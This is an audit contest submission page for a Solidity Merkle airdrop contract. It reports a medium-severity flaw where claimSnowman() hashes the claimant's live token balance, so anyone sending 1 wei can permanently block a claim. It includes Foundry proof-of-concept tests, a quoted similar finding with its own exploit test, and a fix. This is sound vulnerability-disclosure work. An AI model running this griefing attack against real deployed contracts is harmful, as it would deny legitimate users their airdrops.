Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Live `balanceOf()` in Merkle Leaf Construction Allows Permissionless Claim Griefing

bugnetter

Description

SnowmanAirdrop.claimSnowman() is intended to verify a claimant's eligibility via a Merkle proof. The i_merkleRoot is set once in the constructor from fixed (address, amount) pairs using snapshot balances at tree generation time.
The function computes the Merkle leaf using the receiver's current Snow token balance rather than a fixed amount parameter. Any change to a user's Snow balance after tree generation causes the recomputed leaf to differ from the committed one, permanently invalidating their proof and blocking their airdrop claim.

// SnowmanAirdrop.sol:84-88

uint256 amount = i_snow.balanceOf(receiver); // @> reads LIVE balance, not snapshot

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(receiver, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert SA__InvalidProof(); // @> reverts because leaf differs from committed tree

}

Risk

Likelihood:

The attack is permissionless — anyone holding Snow can execute it by transferring any amount (even 1 wei) to a victim's address
The earnSnow() function is permissionless, so the attacker can acquire Snow tokens at no meaningful cost
The attack scales trivially — a single attacker can grief every eligible claimant by iterating transfers across the claimant list

Impact:

Any eligible claimant can be permanently blocked from claiming their Snowman NFT airdrop
The attack costs near zero (1 wei of Snow plus gas) and is irreversible without contract redeployment
The victim has no practical path to recovery — they would need to know their exact snapshot balance to transfer the excess away, but this value is not queryable on-chain

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console} from "forge-std/Test.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {Snowman} from "../src/Snowman.sol";

import {Snow} from "../src/Snow.sol";

contract MockWETH is Test {

mapping(address => uint256) public balanceOf;

function transferFrom(address, address, uint256) external returns (bool) { return true; }

function transfer(address, uint256) external returns (bool) { return true; }

}

contract EnhancedPocCR006 is Test {

SnowmanAirdrop airdrop;

Snowman snowman;

Snow snow;

address victim;

uint256 victimPk;

address attacker;

uint256 originalAmount;

bytes32 merkleRoot;

bytes32[] emptyProof;

function setUp() public {

MockWETH weth = new MockWETH();

snow = new Snow(address(weth), 1, address(this));

snowman = new Snowman("svg");

(victim, victimPk) = makeAddrAndKey("victim");

attacker = makeAddr("attacker");

vm.prank(victim);

snow.earnSnow();

originalAmount = snow.balanceOf(victim);

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(victim, originalAmount))));

merkleRoot = leaf;

airdrop = new SnowmanAirdrop(merkleRoot, address(snow), address(snowman));

snowman.transferOwnership(address(airdrop));

vm.prank(victim);

snow.approve(address(airdrop), type(uint256).max);

vm.warp(block.timestamp + 2 weeks);

vm.prank(attacker);

snow.earnSnow();

}

function test_Baseline_FINAL() public {

bytes32 digest = airdrop.getMessageHash(victim);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPk, digest);

vm.prank(victim);

airdrop.claimSnowman(victim, emptyProof, v, r, s);

assertTrue(airdrop.getClaimStatus(victim));

assertEq(snowman.balanceOf(victim), originalAmount);

}

function test_VulnerabilityDemo_FINAL() public {

// Attacker transfers 1 wei of Snow to victim

vm.prank(attacker);

snow.transfer(victim, 1);

assertEq(snow.balanceOf(victim), originalAmount + 1);

bytes32 digest = airdrop.getMessageHash(victim);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPk, digest);

// Victim's claim reverts — leaf encodes originalAmount + 1 instead of originalAmount

vm.prank(victim);

vm.expectRevert(SnowmanAirdrop.SA__InvalidProof.selector);

airdrop.claimSnowman(victim, emptyProof, v, r, s);

assertFalse(airdrop.getClaimStatus(victim));

}

function test_Variant1_LargeTransfer_FINAL() public {

uint256 attackerBal = snow.balanceOf(attacker);

vm.prank(attacker);

snow.transfer(victim, attackerBal);

bytes32 digest = airdrop.getMessageHash(victim);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPk, digest);

vm.prank(victim);

vm.expectRevert(SnowmanAirdrop.SA__InvalidProof.selector);

airdrop.claimSnowman(victim, emptyProof, v, r, s);

}

function test_Variant2_RecoveryRequiresSnapshotKnowledge_FINAL() public {

vm.prank(attacker);

snow.transfer(victim, 1);

// Victim transfers excess back — only works if they know exact snapshot amount

vm.prank(victim);

snow.transfer(address(0xdead), 1);

assertEq(snow.balanceOf(victim), originalAmount);

bytes32 digest = airdrop.getMessageHash(victim);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPk, digest);

vm.prank(victim);

airdrop.claimSnowman(victim, emptyProof, v, r, s);

assertTrue(airdrop.getClaimStatus(victim));

}

function test_EdgeCase_SignatureValid_MerkleInvalid_FINAL() public {

vm.prank(attacker);

snow.transfer(victim, 1);

uint256 newAmount = snow.balanceOf(victim);

bytes32 digest = airdrop.getMessageHash(victim);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPk, digest);

// Signature is valid — ecrecover returns correct signer

address recovered = ecrecover(digest, v, r, s);

assertEq(recovered, victim);

// But Merkle proof fails — leaf doesn't match committed root

bytes32 newLeaf = keccak256(bytes.concat(keccak256(abi.encode(victim, newAmount))));

assertTrue(newLeaf != merkleRoot);

}

Recommended Mitigation

Pass amount as a function parameter instead of reading it from balanceOf(). This matches the standard Merkle airdrop pattern used by Uniswap, ENS, Optimism, and OpenZeppelin's reference implementation.

function claimSnowman(

address receiver,

+ uint256 amount,

bytes32[] calldata merkleProof,

uint8 v, bytes32 r, bytes32 s

) external nonReentrant {

if (receiver == address(0)) revert SA__ZeroAddress();

+ if (amount == 0) revert SA__ZeroAmount();

if (!_isValidSignature(receiver, getMessageHash(receiver), v, r, s)) {

revert SA__InvalidSignature();

}

- uint256 amount = i_snow.balanceOf(receiver);

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(receiver, amount))));

The getMessageHash function (line 117) also uses balanceOf() and should be updated to accept an amount parameter for consistency.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago

Submission Judgement Published

Validated

Assigned finding tags:

[M-01] DoS to a user trying to claim a Snowman

# Root + Impact ## Description * Users will approve a specific amount of Snow to the SnowmanAirdrop and also sign a message with their address and that same amount, in order to be able to claim the NFT * Because the current amount of Snow owned by the user is used in the verification, an attacker could forcefully send Snow to the receiver in a front-running attack, to prevent the receiver from claiming the NFT.  ```Solidity function getMessageHash(address receiver) public view returns (bytes32) { ... // @audit HIGH An attacker could send 1 wei of Snow token to the receiver and invalidate the signature, causing the receiver to never be able to claim their Snowman uint256 amount = i_snow.balanceOf(receiver); return _hashTypedDataV4( keccak256(abi.encode(MESSAGE_TYPEHASH, SnowmanClaim({receiver: receiver, amount: amount}))) ); ``` ## Risk **Likelihood**: * The attacker must purchase Snow and forcefully send it to the receiver in a front-running attack, so the likelihood is Medium **Impact**: * The impact is High as it could lock out the receiver from claiming forever ## Proof of Concept The attack consists on Bob sending an extra Snow token to Alice before Satoshi claims the NFT on behalf of Alice. To showcase the risk, the extra Snow is earned for free by Bob. ```Solidity function testDoSClaimSnowman() public { assert(snow.balanceOf(alice) == 1); // Get alice's digest while the amount is still 1 bytes32 alDigest = airdrop.getMessageHash(alice); // alice signs a message (uint8 alV, bytes32 alR, bytes32 alS) = vm.sign(alKey, alDigest); vm.startPrank(bob); vm.warp(block.timestamp + 1 weeks); snow.earnSnow(); assert(snow.balanceOf(bob) == 2); snow.transfer(alice, 1); // Alice claim test assert(snow.balanceOf(alice) == 2); vm.startPrank(alice); snow.approve(address(airdrop), 1); // satoshi calls claims on behalf of alice using her signed message vm.startPrank(satoshi); vm.expectRevert(); airdrop.claimSnowman(alice, AL_PROOF, alV, alR, alS); } ``` ## Recommended Mitigation Include the amount to be claimed in both `getMessageHash` and `claimSnowman` instead of reading it from the Snow contract. Showing only the new code in the section below ```Python function claimSnowman(address receiver, uint256 amount, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s) external nonReentrant { ... bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(receiver, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert SA__InvalidProof(); } // @audit LOW Seems like using the ERC20 permit here would allow for both the delegation of the claim and the transfer of the Snow tokens in one transaction i_snow.safeTransferFrom(receiver, address(this), amount); // send ... } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!